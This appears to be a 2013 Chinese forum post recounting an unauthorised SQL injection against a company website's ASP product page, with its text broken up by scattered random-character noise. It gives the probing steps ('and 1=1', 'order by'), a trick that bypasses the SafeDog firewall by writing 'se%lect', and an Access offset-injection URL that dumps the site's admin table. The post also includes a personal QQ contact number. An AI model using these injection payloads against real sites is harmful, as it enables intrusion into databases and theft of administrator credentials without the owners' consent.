打开网站,一个企业站。
: [2 D% o3 B2 s) n! p3 w5 ^$ O' |. \: _$ I
' g5 x; O7 p$ G% \4 s+ f
顺手加个admin
' n! `& m3 P- x+ B- g- e& s
' Y# H9 _0 H8 o( s8 Y7 `2 o
; D7 U4 l4 ~, |4 a1 B0 @% Y默认后台。- o& m2 |9 U. Q+ S
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
7 U* H2 S* n" ^$ K( h% A: E2 Z9 X a
# k P4 z# `) N/ B$ Z7 ~
* n6 X9 e2 z7 l$ X3 M: \6 c3 H- N所以就不用御剑扫了,待会直接封IP。0 W3 f+ h+ I% y+ `; ]' i' ^3 E# o
. i0 J' s' }3 P用order by语句判断是否存在注入。. Y4 e# B9 s; H" ^1 S4 ~
http://www.xxx.com /product_show.asp?id=997 order by 1
! M& N0 g: A6 s3 T% |" ]! u3 ]) Mhttp://www.xxx.com /product_show.asp?id=997 order by 100
) s: O" p/ C% I; K' W+ ]# Y现在存在注入,经测试后发现是9个字段。
7 j+ b* _: l' g
! i# v+ \) e) s3 @+ F3 O接下来进行联合查询,猜是否存在admin表。; U: ~9 z9 }$ _ F/ L" u
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。3 P: Y( K. e1 \' C% \; I' G
4 `9 [9 J& A8 C/ H
/ F! x. {% }6 T1 @& _- X# M3 T
; ^' C/ j/ } G! k3 a) ]! J在select中间加个%,se%lect绕过安全狗。
( z/ k4 _/ ~, e/ @7 v2 u5 {& t" z) x3 @0 w- e; P
- E8 N$ n! R4 d. [
发现存在admin表,然后开始手工猜常用的字段。
8 m9 ` m, h1 U6 J纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
' x6 i: h) ^" m. x / N( r0 Y) J% H' I# g
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。. i- o, N6 l6 h; _1 Y9 r A
5 E, i+ Z7 C: V( m
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
; D$ w8 q4 a! r* S( k1 }9 P Yhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin3 C% X8 P$ E8 H1 D! V+ k
好了,敏感内容出显了。4 G1 W$ [1 G" }6 K; t2 j
* o5 F7 \3 p5 w! U
+ H" W7 L( A* n$ _) B: ?+ H0 M# w
0 |0 Z5 T- l: }$ ^+ z# h" S1 l% x8 l0 E |
发表于 2013-3-8 21:49:45
收藏
支持
反对